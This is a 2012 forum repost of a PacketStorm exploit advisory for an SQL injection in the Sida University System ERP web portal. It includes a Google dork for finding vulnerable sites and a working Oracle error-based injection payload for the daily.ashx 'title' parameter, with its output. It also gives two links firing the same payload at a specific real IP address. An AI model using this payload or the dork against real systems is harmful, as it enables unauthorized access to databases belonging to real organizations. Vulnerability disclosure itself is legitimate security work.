Praetorian503 Posted December 31, 2012 Report Posted December 31, 2012 The ERP (Enterprise Resource Planning) system from Sida University System suffers from a remote SQL injection vulnerability.# Exploit Author: Shahram Darvishvand [karaji_kt21]  <darvishvand.shahram[at]gmail[dot]com>  # Exploit Title: [erp (Enterprise Resource plannin) SQL Injection Vulnerability ] # Vendor : sida university system # Date: [4/May/2012] # Google Dork:   "نرم اÙزار جامع erp شامل قوانین Ú©Ù¾ÛŒ رایت Ù…ÛŒ باشد Ùˆ نوع نسخه بتا Ù…ÛŒ باشد"  # Version: [ 1389/09/17 ] # Tested on: [ASHX .. Application powered by Oracle DBMS]============================================================** This Vulnerability Is On version 1389/09/17 **--------------------------------------------Exploit :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title==============================================================Example :  http://[IP Or Domain]/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--Response : Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit==========================================================[+] Greetz : Fahime.Saveh , Behrooz_Ice ********************************For Screen shot 1 :http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--For Screen Shot 2 :http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--Source: PacketStorm Quote
